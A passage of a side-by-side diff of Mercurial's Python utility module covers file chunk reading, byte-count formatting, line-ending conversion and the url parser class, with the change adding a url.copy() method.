2685
2685
2686 chunkremaining = chunkl - offset
2686 chunkremaining = chunkl - offset
2687
2687
2688 # Use all of unconsumed part of chunk.
2688 # Use all of unconsumed part of chunk.
2689 if left >= chunkremaining:
2689 if left >= chunkremaining:
2690 left -= chunkremaining
2690 left -= chunkremaining
2691 queue.popleft()
2691 queue.popleft()
2692 # offset == 0 is enabled by block above, so this won't merely
2692 # offset == 0 is enabled by block above, so this won't merely
2693 # copy via ``chunk[0:]``.
2693 # copy via ``chunk[0:]``.
2694 buf.append(chunk[offset:])
2694 buf.append(chunk[offset:])
2695 self._chunkoffset = 0
2695 self._chunkoffset = 0
2696
2696
2697 # Partial chunk needed.
2697 # Partial chunk needed.
2698 else:
2698 else:
2699 buf.append(chunk[offset : offset + left])
2699 buf.append(chunk[offset : offset + left])
2700 self._chunkoffset += left
2700 self._chunkoffset += left
2701 left -= chunkremaining
2701 left -= chunkremaining
2702
2702
2703 return b''.join(buf)
2703 return b''.join(buf)
2704
2704
2705
2705
2706 def filechunkiter(f, size=131072, limit=None):
2706 def filechunkiter(f, size=131072, limit=None):
2707 """Create a generator that produces the data in the file size
2707 """Create a generator that produces the data in the file size
2708 (default 131072) bytes at a time, up to optional limit (default is
2708 (default 131072) bytes at a time, up to optional limit (default is
2709 to read all data). Chunks may be less than size bytes if the
2709 to read all data). Chunks may be less than size bytes if the
2710 chunk is the last chunk in the file, or the file is a socket or
2710 chunk is the last chunk in the file, or the file is a socket or
2711 some other type of file that sometimes reads less data than is
2711 some other type of file that sometimes reads less data than is
2712 requested."""
2712 requested."""
2713 assert size >= 0
2713 assert size >= 0
2714 assert limit is None or limit >= 0
2714 assert limit is None or limit >= 0
2715 while True:
2715 while True:
2716 if limit is None:
2716 if limit is None:
2717 nbytes = size
2717 nbytes = size
2718 else:
2718 else:
2719 nbytes = min(limit, size)
2719 nbytes = min(limit, size)
2720 s = nbytes and f.read(nbytes)
2720 s = nbytes and f.read(nbytes)
2721 if not s:
2721 if not s:
2722 break
2722 break
2723 if limit:
2723 if limit:
2724 limit -= len(s)
2724 limit -= len(s)
2725 yield s
2725 yield s
2726
2726
2727
2727
2728 class cappedreader(object):
2728 class cappedreader(object):
2729 """A file object proxy that allows reading up to N bytes.
2729 """A file object proxy that allows reading up to N bytes.
2730
2730
2731 Given a source file object, instances of this type allow reading up to
2731 Given a source file object, instances of this type allow reading up to
2732 N bytes from that source file object. Attempts to read past the allowed
2732 N bytes from that source file object. Attempts to read past the allowed
2733 limit are treated as EOF.
2733 limit are treated as EOF.
2734
2734
2735 It is assumed that I/O is not performed on the original file object
2735 It is assumed that I/O is not performed on the original file object
2736 in addition to I/O that is performed by this instance. If there is,
2736 in addition to I/O that is performed by this instance. If there is,
2737 state tracking will get out of sync and unexpected results will ensue.
2737 state tracking will get out of sync and unexpected results will ensue.
2738 """
2738 """
2739
2739
2740 def __init__(self, fh, limit):
2740 def __init__(self, fh, limit):
2741 """Allow reading up to <limit> bytes from <fh>."""
2741 """Allow reading up to <limit> bytes from <fh>."""
2742 self._fh = fh
2742 self._fh = fh
2743 self._left = limit
2743 self._left = limit
2744
2744
2745 def read(self, n=-1):
2745 def read(self, n=-1):
2746 if not self._left:
2746 if not self._left:
2747 return b''
2747 return b''
2748
2748
2749 if n < 0:
2749 if n < 0:
2750 n = self._left
2750 n = self._left
2751
2751
2752 data = self._fh.read(min(n, self._left))
2752 data = self._fh.read(min(n, self._left))
2753 self._left -= len(data)
2753 self._left -= len(data)
2754 assert self._left >= 0
2754 assert self._left >= 0
2755
2755
2756 return data
2756 return data
2757
2757
2758 def readinto(self, b):
2758 def readinto(self, b):
2759 res = self.read(len(b))
2759 res = self.read(len(b))
2760 if res is None:
2760 if res is None:
2761 return None
2761 return None
2762
2762
2763 b[0 : len(res)] = res
2763 b[0 : len(res)] = res
2764 return len(res)
2764 return len(res)
2765
2765
2766
2766
2767 def unitcountfn(*unittable):
2767 def unitcountfn(*unittable):
2768 '''return a function that renders a readable count of some quantity'''
2768 '''return a function that renders a readable count of some quantity'''
2769
2769
2770 def go(count):
2770 def go(count):
2771 for multiplier, divisor, format in unittable:
2771 for multiplier, divisor, format in unittable:
2772 if abs(count) >= divisor * multiplier:
2772 if abs(count) >= divisor * multiplier:
2773 return format % (count / float(divisor))
2773 return format % (count / float(divisor))
2774 return unittable[-1][2] % count
2774 return unittable[-1][2] % count
2775
2775
2776 return go
2776 return go
2777
2777
2778
2778
2779 def processlinerange(fromline, toline):
2779 def processlinerange(fromline, toline):
2780 # type: (int, int) -> Tuple[int, int]
2780 # type: (int, int) -> Tuple[int, int]
2781 """Check that linerange <fromline>:<toline> makes sense and return a
2781 """Check that linerange <fromline>:<toline> makes sense and return a
2782 0-based range.
2782 0-based range.
2783
2783
2784 >>> processlinerange(10, 20)
2784 >>> processlinerange(10, 20)
2785 (9, 20)
2785 (9, 20)
2786 >>> processlinerange(2, 1)
2786 >>> processlinerange(2, 1)
2787 Traceback (most recent call last):
2787 Traceback (most recent call last):
2788 ...
2788 ...
2789 ParseError: line range must be positive
2789 ParseError: line range must be positive
2790 >>> processlinerange(0, 5)
2790 >>> processlinerange(0, 5)
2791 Traceback (most recent call last):
2791 Traceback (most recent call last):
2792 ...
2792 ...
2793 ParseError: fromline must be strictly positive
2793 ParseError: fromline must be strictly positive
2794 """
2794 """
2795 if toline - fromline < 0:
2795 if toline - fromline < 0:
2796 raise error.ParseError(_(b"line range must be positive"))
2796 raise error.ParseError(_(b"line range must be positive"))
2797 if fromline < 1:
2797 if fromline < 1:
2798 raise error.ParseError(_(b"fromline must be strictly positive"))
2798 raise error.ParseError(_(b"fromline must be strictly positive"))
2799 return fromline - 1, toline
2799 return fromline - 1, toline
2800
2800
2801
2801
2802 bytecount = unitcountfn(
2802 bytecount = unitcountfn(
2803 (100, 1 << 30, _(b'%.0f GB')),
2803 (100, 1 << 30, _(b'%.0f GB')),
2804 (10, 1 << 30, _(b'%.1f GB')),
2804 (10, 1 << 30, _(b'%.1f GB')),
2805 (1, 1 << 30, _(b'%.2f GB')),
2805 (1, 1 << 30, _(b'%.2f GB')),
2806 (100, 1 << 20, _(b'%.0f MB')),
2806 (100, 1 << 20, _(b'%.0f MB')),
2807 (10, 1 << 20, _(b'%.1f MB')),
2807 (10, 1 << 20, _(b'%.1f MB')),
2808 (1, 1 << 20, _(b'%.2f MB')),
2808 (1, 1 << 20, _(b'%.2f MB')),
2809 (100, 1 << 10, _(b'%.0f KB')),
2809 (100, 1 << 10, _(b'%.0f KB')),
2810 (10, 1 << 10, _(b'%.1f KB')),
2810 (10, 1 << 10, _(b'%.1f KB')),
2811 (1, 1 << 10, _(b'%.2f KB')),
2811 (1, 1 << 10, _(b'%.2f KB')),
2812 (1, 1, _(b'%.0f bytes')),
2812 (1, 1, _(b'%.0f bytes')),
2813 )
2813 )
2814
2814
2815
2815
2816 class transformingwriter(object):
2816 class transformingwriter(object):
2817 """Writable file wrapper to transform data by function"""
2817 """Writable file wrapper to transform data by function"""
2818
2818
2819 def __init__(self, fp, encode):
2819 def __init__(self, fp, encode):
2820 self._fp = fp
2820 self._fp = fp
2821 self._encode = encode
2821 self._encode = encode
2822
2822
2823 def close(self):
2823 def close(self):
2824 self._fp.close()
2824 self._fp.close()
2825
2825
2826 def flush(self):
2826 def flush(self):
2827 self._fp.flush()
2827 self._fp.flush()
2828
2828
2829 def write(self, data):
2829 def write(self, data):
2830 return self._fp.write(self._encode(data))
2830 return self._fp.write(self._encode(data))
2831
2831
2832
2832
2833 # Matches a single EOL which can either be a CRLF where repeated CR
2833 # Matches a single EOL which can either be a CRLF where repeated CR
2834 # are removed or a LF. We do not care about old Macintosh files, so a
2834 # are removed or a LF. We do not care about old Macintosh files, so a
2835 # stray CR is an error.
2835 # stray CR is an error.
2836 _eolre = remod.compile(br'\r*\n')
2836 _eolre = remod.compile(br'\r*\n')
2837
2837
2838
2838
2839 def tolf(s):
2839 def tolf(s):
2840 # type: (bytes) -> bytes
2840 # type: (bytes) -> bytes
2841 return _eolre.sub(b'\n', s)
2841 return _eolre.sub(b'\n', s)
2842
2842
2843
2843
2844 def tocrlf(s):
2844 def tocrlf(s):
2845 # type: (bytes) -> bytes
2845 # type: (bytes) -> bytes
2846 return _eolre.sub(b'\r\n', s)
2846 return _eolre.sub(b'\r\n', s)
2847
2847
2848
2848
2849 def _crlfwriter(fp):
2849 def _crlfwriter(fp):
2850 return transformingwriter(fp, tocrlf)
2850 return transformingwriter(fp, tocrlf)
2851
2851
2852
2852
2853 if pycompat.oslinesep == b'\r\n':
2853 if pycompat.oslinesep == b'\r\n':
2854 tonativeeol = tocrlf
2854 tonativeeol = tocrlf
2855 fromnativeeol = tolf
2855 fromnativeeol = tolf
2856 nativeeolwriter = _crlfwriter
2856 nativeeolwriter = _crlfwriter
2857 else:
2857 else:
2858 tonativeeol = pycompat.identity
2858 tonativeeol = pycompat.identity
2859 fromnativeeol = pycompat.identity
2859 fromnativeeol = pycompat.identity
2860 nativeeolwriter = pycompat.identity
2860 nativeeolwriter = pycompat.identity
2861
2861
2862 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2862 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2863 3,
2863 3,
2864 0,
2864 0,
2865 ):
2865 ):
2866 # There is an issue in CPython that some IO methods do not handle EINTR
2866 # There is an issue in CPython that some IO methods do not handle EINTR
2867 # correctly. The following table shows what CPython version (and functions)
2867 # correctly. The following table shows what CPython version (and functions)
2868 # are affected (buggy: has the EINTR bug, okay: otherwise):
2868 # are affected (buggy: has the EINTR bug, okay: otherwise):
2869 #
2869 #
2870 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2870 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2871 # --------------------------------------------------
2871 # --------------------------------------------------
2872 # fp.__iter__ | buggy | buggy | okay
2872 # fp.__iter__ | buggy | buggy | okay
2873 # fp.read* | buggy | okay [1] | okay
2873 # fp.read* | buggy | okay [1] | okay
2874 #
2874 #
2875 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2875 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2876 #
2876 #
2877 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2877 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2878 # like "read*" work fine, as we do not support Python < 2.7.4.
2878 # like "read*" work fine, as we do not support Python < 2.7.4.
2879 #
2879 #
2880 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2880 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2881 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2881 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2882 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2882 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2883 # fp.__iter__ but not other fp.read* methods.
2883 # fp.__iter__ but not other fp.read* methods.
2884 #
2884 #
2885 # On modern systems like Linux, the "read" syscall cannot be interrupted
2885 # On modern systems like Linux, the "read" syscall cannot be interrupted
2886 # when reading "fast" files like on-disk files. So the EINTR issue only
2886 # when reading "fast" files like on-disk files. So the EINTR issue only
2887 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2887 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2888 # files approximately as "fast" files and use the fast (unsafe) code path,
2888 # files approximately as "fast" files and use the fast (unsafe) code path,
2889 # to minimize the performance impact.
2889 # to minimize the performance impact.
2890
2890
2891 def iterfile(fp):
2891 def iterfile(fp):
2892 fastpath = True
2892 fastpath = True
2893 if type(fp) is file:
2893 if type(fp) is file:
2894 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2894 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2895 if fastpath:
2895 if fastpath:
2896 return fp
2896 return fp
2897 else:
2897 else:
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 return iter(fp.readline, b'')
2899 return iter(fp.readline, b'')
2900
2900
2901
2901
2902 else:
2902 else:
2903 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2903 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2904 def iterfile(fp):
2904 def iterfile(fp):
2905 return fp
2905 return fp
2906
2906
2907
2907
2908 def iterlines(iterator):
2908 def iterlines(iterator):
2909 # type: (Iterator[bytes]) -> Iterator[bytes]
2909 # type: (Iterator[bytes]) -> Iterator[bytes]
2910 for chunk in iterator:
2910 for chunk in iterator:
2911 for line in chunk.splitlines():
2911 for line in chunk.splitlines():
2912 yield line
2912 yield line
2913
2913
2914
2914
2915 def expandpath(path):
2915 def expandpath(path):
2916 # type: (bytes) -> bytes
2916 # type: (bytes) -> bytes
2917 return os.path.expanduser(os.path.expandvars(path))
2917 return os.path.expanduser(os.path.expandvars(path))
2918
2918
2919
2919
2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2921 """Return the result of interpolating items in the mapping into string s.
2921 """Return the result of interpolating items in the mapping into string s.
2922
2922
2923 prefix is a single character string, or a two character string with
2923 prefix is a single character string, or a two character string with
2924 a backslash as the first character if the prefix needs to be escaped in
2924 a backslash as the first character if the prefix needs to be escaped in
2925 a regular expression.
2925 a regular expression.
2926
2926
2927 fn is an optional function that will be applied to the replacement text
2927 fn is an optional function that will be applied to the replacement text
2928 just before replacement.
2928 just before replacement.
2929
2929
2930 escape_prefix is an optional flag that allows using doubled prefix for
2930 escape_prefix is an optional flag that allows using doubled prefix for
2931 its escaping.
2931 its escaping.
2932 """
2932 """
2933 fn = fn or (lambda s: s)
2933 fn = fn or (lambda s: s)
2934 patterns = b'|'.join(mapping.keys())
2934 patterns = b'|'.join(mapping.keys())
2935 if escape_prefix:
2935 if escape_prefix:
2936 patterns += b'|' + prefix
2936 patterns += b'|' + prefix
2937 if len(prefix) > 1:
2937 if len(prefix) > 1:
2938 prefix_char = prefix[1:]
2938 prefix_char = prefix[1:]
2939 else:
2939 else:
2940 prefix_char = prefix
2940 prefix_char = prefix
2941 mapping[prefix_char] = prefix_char
2941 mapping[prefix_char] = prefix_char
2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944
2944
2945
2945
2946 def getport(port):
2946 def getport(port):
2947 # type: (Union[bytes, int]) -> int
2947 # type: (Union[bytes, int]) -> int
2948 """Return the port for a given network service.
2948 """Return the port for a given network service.
2949
2949
2950 If port is an integer, it's returned as is. If it's a string, it's
2950 If port is an integer, it's returned as is. If it's a string, it's
2951 looked up using socket.getservbyname(). If there's no matching
2951 looked up using socket.getservbyname(). If there's no matching
2952 service, error.Abort is raised.
2952 service, error.Abort is raised.
2953 """
2953 """
2954 try:
2954 try:
2955 return int(port)
2955 return int(port)
2956 except ValueError:
2956 except ValueError:
2957 pass
2957 pass
2958
2958
2959 try:
2959 try:
2960 return socket.getservbyname(pycompat.sysstr(port))
2960 return socket.getservbyname(pycompat.sysstr(port))
2961 except socket.error:
2961 except socket.error:
2962 raise error.Abort(
2962 raise error.Abort(
2963 _(b"no port number associated with service '%s'") % port
2963 _(b"no port number associated with service '%s'") % port
2964 )
2964 )
2965
2965
2966
2966
2967 class url(object):
2967 class url(object):
2968 r"""Reliable URL parser.
2968 r"""Reliable URL parser.
2969
2969
2970 This parses URLs and provides attributes for the following
2970 This parses URLs and provides attributes for the following
2971 components:
2971 components:
2972
2972
2973 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2973 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2974
2974
2975 Missing components are set to None. The only exception is
2975 Missing components are set to None. The only exception is
2976 fragment, which is set to '' if present but empty.
2976 fragment, which is set to '' if present but empty.
2977
2977
2978 If parsefragment is False, fragment is included in query. If
2978 If parsefragment is False, fragment is included in query. If
2979 parsequery is False, query is included in path. If both are
2979 parsequery is False, query is included in path. If both are
2980 False, both fragment and query are included in path.
2980 False, both fragment and query are included in path.
2981
2981
2982 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2982 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2983
2983
2984 Note that for backward compatibility reasons, bundle URLs do not
2984 Note that for backward compatibility reasons, bundle URLs do not
2985 take host names. That means 'bundle://../' has a path of '../'.
2985 take host names. That means 'bundle://../' has a path of '../'.
2986
2986
2987 Examples:
2987 Examples:
2988
2988
2989 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2989 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2990 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2990 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2991 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2991 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2992 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2992 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2993 >>> url(b'file:///home/joe/repo')
2993 >>> url(b'file:///home/joe/repo')
2994 <url scheme: 'file', path: '/home/joe/repo'>
2994 <url scheme: 'file', path: '/home/joe/repo'>
2995 >>> url(b'file:///c:/temp/foo/')
2995 >>> url(b'file:///c:/temp/foo/')
2996 <url scheme: 'file', path: 'c:/temp/foo/'>
2996 <url scheme: 'file', path: 'c:/temp/foo/'>
2997 >>> url(b'bundle:foo')
2997 >>> url(b'bundle:foo')
2998 <url scheme: 'bundle', path: 'foo'>
2998 <url scheme: 'bundle', path: 'foo'>
2999 >>> url(b'bundle://../foo')
2999 >>> url(b'bundle://../foo')
3000 <url scheme: 'bundle', path: '../foo'>
3000 <url scheme: 'bundle', path: '../foo'>
3001 >>> url(br'c:\foo\bar')
3001 >>> url(br'c:\foo\bar')
3002 <url path: 'c:\\foo\\bar'>
3002 <url path: 'c:\\foo\\bar'>
3003 >>> url(br'\\blah\blah\blah')
3003 >>> url(br'\\blah\blah\blah')
3004 <url path: '\\\\blah\\blah\\blah'>
3004 <url path: '\\\\blah\\blah\\blah'>
3005 >>> url(br'\\blah\blah\blah#baz')
3005 >>> url(br'\\blah\blah\blah#baz')
3006 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3006 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3007 >>> url(br'file:///C:\users\me')
3007 >>> url(br'file:///C:\users\me')
3008 <url scheme: 'file', path: 'C:\\users\\me'>
3008 <url scheme: 'file', path: 'C:\\users\\me'>
3009
3009
3010 Authentication credentials:
3010 Authentication credentials:
3011
3011
3012 >>> url(b'ssh://joe:xyz@x/repo')
3012 >>> url(b'ssh://joe:xyz@x/repo')
3013 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3013 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3014 >>> url(b'ssh://joe@x/repo')
3014 >>> url(b'ssh://joe@x/repo')
3015 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3015 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3016
3016
3017 Query strings and fragments:
3017 Query strings and fragments:
3018
3018
3019 >>> url(b'http://host/a?b#c')
3019 >>> url(b'http://host/a?b#c')
3020 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3020 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3021 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3021 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3022 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3022 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3023
3023
3024 Empty path:
3024 Empty path:
3025
3025
3026 >>> url(b'')
3026 >>> url(b'')
3027 <url path: ''>
3027 <url path: ''>
3028 >>> url(b'#a')
3028 >>> url(b'#a')
3029 <url path: '', fragment: 'a'>
3029 <url path: '', fragment: 'a'>
3030 >>> url(b'http://host/')
3030 >>> url(b'http://host/')
3031 <url scheme: 'http', host: 'host', path: ''>
3031 <url scheme: 'http', host: 'host', path: ''>
3032 >>> url(b'http://host/#a')
3032 >>> url(b'http://host/#a')
3033 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3033 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3034
3034
3035 Only scheme:
3035 Only scheme:
3036
3036
3037 >>> url(b'http:')
3037 >>> url(b'http:')
3038 <url scheme: 'http'>
3038 <url scheme: 'http'>
3039 """
3039 """
3040
3040
3041 _safechars = b"!~*'()+"
3041 _safechars = b"!~*'()+"
3042 _safepchars = b"/!~*'()+:\\"
3042 _safepchars = b"/!~*'()+:\\"
3043 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3043 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3044
3044
3045 def __init__(self, path, parsequery=True, parsefragment=True):
3045 def __init__(self, path, parsequery=True, parsefragment=True):
3046 # type: (bytes, bool, bool) -> None
3046 # type: (bytes, bool, bool) -> None
3047 # We slowly chomp away at path until we have only the path left
3047 # We slowly chomp away at path until we have only the path left
3048 self.scheme = self.user = self.passwd = self.host = None
3048 self.scheme = self.user = self.passwd = self.host = None
3049 self.port = self.path = self.query = self.fragment = None
3049 self.port = self.path = self.query = self.fragment = None
3050 self._localpath = True
3050 self._localpath = True
3051 self._hostport = b''
3051 self._hostport = b''
3052 self._origpath = path
3052 self._origpath = path
3053
3053
3054 if parsefragment and b'#' in path:
3054 if parsefragment and b'#' in path:
3055 path, self.fragment = path.split(b'#', 1)
3055 path, self.fragment = path.split(b'#', 1)
3056
3056
3057 # special case for Windows drive letters and UNC paths
3057 # special case for Windows drive letters and UNC paths
3058 if hasdriveletter(path) or path.startswith(b'\\\\'):
3058 if hasdriveletter(path) or path.startswith(b'\\\\'):
3059 self.path = path
3059 self.path = path
3060 return
3060 return
3061
3061
3062 # For compatibility reasons, we can't handle bundle paths as
3062 # For compatibility reasons, we can't handle bundle paths as
3063 # normal URLS
3063 # normal URLS
3064 if path.startswith(b'bundle:'):
3064 if path.startswith(b'bundle:'):
3065 self.scheme = b'bundle'
3065 self.scheme = b'bundle'
3066 path = path[7:]
3066 path = path[7:]
3067 if path.startswith(b'//'):
3067 if path.startswith(b'//'):
3068 path = path[2:]
3068 path = path[2:]
3069 self.path = path
3069 self.path = path
3070 return
3070 return
3071
3071
3072 if self._matchscheme(path):
3072 if self._matchscheme(path):
3073 parts = path.split(b':', 1)
3073 parts = path.split(b':', 1)
3074 if parts[0]:
3074 if parts[0]:
3075 self.scheme, path = parts
3075 self.scheme, path = parts
3076 self._localpath = False
3076 self._localpath = False
3077
3077
3078 if not path:
3078 if not path:
3079 path = None
3079 path = None
3080 if self._localpath:
3080 if self._localpath:
3081 self.path = b''
3081 self.path = b''
3082 return
3082 return
3083 else:
3083 else:
3084 if self._localpath:
3084 if self._localpath:
3085 self.path = path
3085 self.path = path
3086 return
3086 return
3087
3087
3088 if parsequery and b'?' in path:
3088 if parsequery and b'?' in path:
3089 path, self.query = path.split(b'?', 1)
3089 path, self.query = path.split(b'?', 1)
3090 if not path:
3090 if not path:
3091 path = None
3091 path = None
3092 if not self.query:
3092 if not self.query:
3093 self.query = None
3093 self.query = None
3094
3094
3095 # // is required to specify a host/authority
3095 # // is required to specify a host/authority
3096 if path and path.startswith(b'//'):
3096 if path and path.startswith(b'//'):
3097 parts = path[2:].split(b'/', 1)
3097 parts = path[2:].split(b'/', 1)
3098 if len(parts) > 1:
3098 if len(parts) > 1:
3099 self.host, path = parts
3099 self.host, path = parts
3100 else:
3100 else:
3101 self.host = parts[0]
3101 self.host = parts[0]
3102 path = None
3102 path = None
3103 if not self.host:
3103 if not self.host:
3104 self.host = None
3104 self.host = None
3105 # path of file:///d is /d
3105 # path of file:///d is /d
3106 # path of file:///d:/ is d:/, not /d:/
3106 # path of file:///d:/ is d:/, not /d:/
3107 if path and not hasdriveletter(path):
3107 if path and not hasdriveletter(path):
3108 path = b'/' + path
3108 path = b'/' + path
3109
3109
3110 if self.host and b'@' in self.host:
3110 if self.host and b'@' in self.host:
3111 self.user, self.host = self.host.rsplit(b'@', 1)
3111 self.user, self.host = self.host.rsplit(b'@', 1)
3112 if b':' in self.user:
3112 if b':' in self.user:
3113 self.user, self.passwd = self.user.split(b':', 1)
3113 self.user, self.passwd = self.user.split(b':', 1)
3114 if not self.host:
3114 if not self.host:
3115 self.host = None
3115 self.host = None
3116
3116
3117 # Don't split on colons in IPv6 addresses without ports
3117 # Don't split on colons in IPv6 addresses without ports
3118 if (
3118 if (
3119 self.host
3119 self.host
3120 and b':' in self.host
3120 and b':' in self.host
3121 and not (
3121 and not (
3122 self.host.startswith(b'[') and self.host.endswith(b']')
3122 self.host.startswith(b'[') and self.host.endswith(b']')
3123 )
3123 )
3124 ):
3124 ):
3125 self._hostport = self.host
3125 self._hostport = self.host
3126 self.host, self.port = self.host.rsplit(b':', 1)
3126 self.host, self.port = self.host.rsplit(b':', 1)
3127 if not self.host:
3127 if not self.host:
3128 self.host = None
3128 self.host = None
3129
3129
3130 if (
3130 if (
3131 self.host
3131 self.host
3132 and self.scheme == b'file'
3132 and self.scheme == b'file'
3133 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3133 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3134 ):
3134 ):
3135 raise error.Abort(
3135 raise error.Abort(
3136 _(b'file:// URLs can only refer to localhost')
3136 _(b'file:// URLs can only refer to localhost')
3137 )
3137 )
3138
3138
3139 self.path = path
3139 self.path = path
3140
3140
3141 # leave the query string escaped
3141 # leave the query string escaped
3142 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3142 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3143 v = getattr(self, a)
3143 v = getattr(self, a)
3144 if v is not None:
3144 if v is not None:
3145 setattr(self, a, urlreq.unquote(v))
3145 setattr(self, a, urlreq.unquote(v))
3146
3146
3147 def copy(self):
3148 u = url(b'temporary useless value')
3149 u.path = self.path
3150 u.scheme = self.scheme
3151 u.user = self.user
3152 u.passwd = self.passwd
3153 u.host = self.host
3154 u.path = self.path
3155 u.query = self.query
3156 u.fragment = self.fragment
3157 u._localpath = self._localpath
3158 u._hostport = self._hostport
3159 u._origpath = self._origpath
3160 return u
3161
3147 @encoding.strmethod
3162 @encoding.strmethod
3148 def __repr__(self):
3163 def __repr__(self):
3149 attrs = []
3164 attrs = []
3150 for a in (
3165 for a in (
3151 b'scheme',
3166 b'scheme',
3152 b'user',
3167 b'user',
3153 b'passwd',
3168 b'passwd',
3154 b'host',
3169 b'host',
3155 b'port',
3170 b'port',
3156 b'path',
3171 b'path',
3157 b'query',
3172 b'query',
3158 b'fragment',
3173 b'fragment',
3159 ):
3174 ):
3160 v = getattr(self, a)
3175 v = getattr(self, a)
3161 if v is not None:
3176 if v is not None:
3162 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3177 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3163 return b'<url %s>' % b', '.join(attrs)
3178 return b'<url %s>' % b', '.join(attrs)
3164
3179
3165 def __bytes__(self):
3180 def __bytes__(self):
3166 r"""Join the URL's components back into a URL string.
3181 r"""Join the URL's components back into a URL string.
3167
3182
3168 Examples:
3183 Examples:
3169
3184
3170 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3185 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3171 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3186 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3172 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3187 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3173 'http://user:pw@host:80/?foo=bar&baz=42'
3188 'http://user:pw@host:80/?foo=bar&baz=42'
3174 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3189 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3175 'http://user:pw@host:80/?foo=bar%3dbaz'
3190 'http://user:pw@host:80/?foo=bar%3dbaz'
3176 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3191 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3177 'ssh://user:pw@[::1]:2200//home/joe#'
3192 'ssh://user:pw@[::1]:2200//home/joe#'
3178 >>> bytes(url(b'http://localhost:80//'))
3193 >>> bytes(url(b'http://localhost:80//'))
3179 'http://localhost:80//'
3194 'http://localhost:80//'
3180 >>> bytes(url(b'http://localhost:80/'))
3195 >>> bytes(url(b'http://localhost:80/'))
3181 'http://localhost:80/'
3196 'http://localhost:80/'
3182 >>> bytes(url(b'http://localhost:80'))
3197 >>> bytes(url(b'http://localhost:80'))
3183 'http://localhost:80/'
3198 'http://localhost:80/'
3184 >>> bytes(url(b'bundle:foo'))
3199 >>> bytes(url(b'bundle:foo'))
3185 'bundle:foo'
3200 'bundle:foo'
3186 >>> bytes(url(b'bundle://../foo'))
3201 >>> bytes(url(b'bundle://../foo'))
3187 'bundle:../foo'
3202 'bundle:../foo'
3188 >>> bytes(url(b'path'))
3203 >>> bytes(url(b'path'))
3189 'path'
3204 'path'
